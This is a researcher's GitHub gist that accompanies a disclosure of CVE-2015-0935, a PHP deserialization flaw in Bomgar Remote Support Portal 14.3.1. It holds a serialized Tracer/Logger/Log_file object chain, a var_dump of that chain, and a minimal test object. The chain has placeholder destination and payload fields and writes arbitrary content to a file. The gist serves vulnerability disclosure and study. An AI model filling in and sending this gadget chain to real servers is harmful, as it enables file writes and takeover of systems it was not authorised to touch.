Skip to content

Instantly share code, notes, and snippets.

@mwulftange

mwulftange/gist:263efd3b2bb833c2bd48

Last active August 29, 2015 14:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mwulftange/263efd3b2bb833c2bd48 to your computer and use it in GitHub Desktop.
Save mwulftange/263efd3b2bb833c2bd48 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2015-0935: Deserialization of Untrusted Data in Bomgar Remote Support Portal 14.3.1 (http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html)
Raw
gistfile1.txt
O:6:"Tracer":1:{s:12:"\0Tracer\0_log";O:6:"Logger":1:{s:13:"\0Logger\0_logs";a:1:{s:0:"";O:8:"Log_file":4:{s:9:"_filename";s:13:"<destination>";s:11:"_lineFormat";s:9:"<payload>";s:7:"_append";b:0;s:4:"_eol";s:0:"";}}}}
Raw
gistfile2.txt
object(Tracer)#1 (1) {
["_log":"Tracer":private]=>
object(Logger)#2 (1) {
["_logs":"Logger":private]=>
array(1) {
[""]=>
object(Log_file)#3 (4) {
["_filename"]=>
string(13) "<destination>"
["_lineFormat"]=>
string(9) "<payload>"
["_append"]=>
bool(false)
["_eol"]=>
string(0) ""
}
}
}
}
Raw
gistfile3.txt
O:8:"_tmp_poc":0:{}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment